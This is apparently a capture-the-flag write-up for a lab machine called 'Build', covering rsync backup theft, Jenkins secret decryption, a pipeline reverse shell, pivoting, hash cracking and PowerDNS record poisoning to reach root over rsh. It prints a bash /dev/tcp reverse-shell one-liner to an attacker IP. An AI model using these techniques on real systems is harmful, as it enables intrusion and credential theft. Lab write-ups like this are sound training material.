Build is an "easy" difficulty machine, Where we have to get credentials from a backup file, access the internal network and add new records in order to bypass the docker container.

Difficulty:

Easy

Enumeration

The Nmap scan shows the following ports.
nmap -p- --min-rate=10000 10.10.67.89

nmap -sC -sV -p21,23,80 10.10.67.89 -oA ./nmap/Build

|Ports|Service
|22| ssh OpenSSH 8.9p1 Ubuntu
|53| Domain PowerDNS
|512| exec
|513| login
|514| shell Netkit rshd
|873| rsync
|3000| ppp?
|3306| mysql
|8081| blackice-icecap

Default creds on ssh didn’t work. And MySQL and Rlogin weren’t reachable.

Next, I visited Port 3000 and Found Gitea, a self-hosted git service.

After registering to the platform I checked the company repository and found dev repository by buildadm which seems like a Jenkins project.

Next, I check rsync to check the share in port 873 and Found a Jenkins backup file.

rsync -av rsync://10.10.67.89/backups

rsync -av rsync://10.10.67.89/backups .

Foothold

In my research of Jenkins, I found out that to decrypt secrets we need master.key, hudson.util.Secret and the XML file containing the secrets. We can also use Jenkin_offline_decryptor to decrypt the secret.

HackTricks Cloud

After decrypting the files found in the backup I got the password of buildadm.

Now after logging into the website I can edit the script and get reverse shell after waiting for a little bit.
sh ''' bash -c 'bash -i >& /dev/tcp/10.8.2.110/1234' '''

Jenkins-rce-modifying-pipeline

Docker Escape

Inside the home directory, I found rhosts file which contained some server names. I’m likely inside a docker container.

Next, I used Chisel in order to connect to internal running services.




I also made sure to change proxychains config file

A lot of the core binary/functions are missing in the docker. I went back to the website and found the internal IP address inside the webhook.

Now we can scan the internal ports.

Default creds can get us access to MySql server.

After enumerating the databases I got the admin hash and more services that are running inside.

1
2
3
4
5
6
7
8
9
10
11
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin |
| sys |
+--------------------+
5 rows in set (0.130 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
MariaDB [powerdnsadmin]> SHOW TABLES;
+-------------------------+
| Tables_in_powerdnsadmin |
+-------------------------+
| account |
| account_user |
| alembic_version |
| apikey |
| apikey_account |
| comments |
| cryptokeys |
| domain |
| domain_apikey |
| domain_setting |
| domain_template |
| domain_template_record |
| domain_user |
| domainmetadata |
| domains |
| history |
| records |
| role |
| sessions |
| setting |
| supermasters |
| tsigkeys |
| user |
+-------------------------+
23 rows in set (0.130 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
MariaDB [powerdnsadmin]> SELECT * FROM user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK0o7YSc2<...SNIP...>.hsEq | admin | admin | [email protected] | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.128 sec)
MariaDB [powerdnsadmin]> SELECT * FROM records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.129 sec)

I started scanning the newly found IPs.


PowerDNS running on 172.18.0.6 and the login page was exposed as well.

To access the internal website in the browser I had to create a new socks5 config in ForxyProxy.

Now Im able to to access the website’s login page.

I used Hashcat to crack the hash and got the admin password.

After logging in with the admin creds I presented with the zone management dashboard of build.vl.


I can redirect the internal admin.build.vl to my IP by adding a new record in the zone management.
Now I will be able to access the main machine instead of the container.

Using Metasploit rlogin_login module I check to see if default cred combinations work and if root with no passwords can log in.

Now I can log in using rsh client.

Note: Kali removed rsh client, In order to install sudo apt-get install rsh-redone-client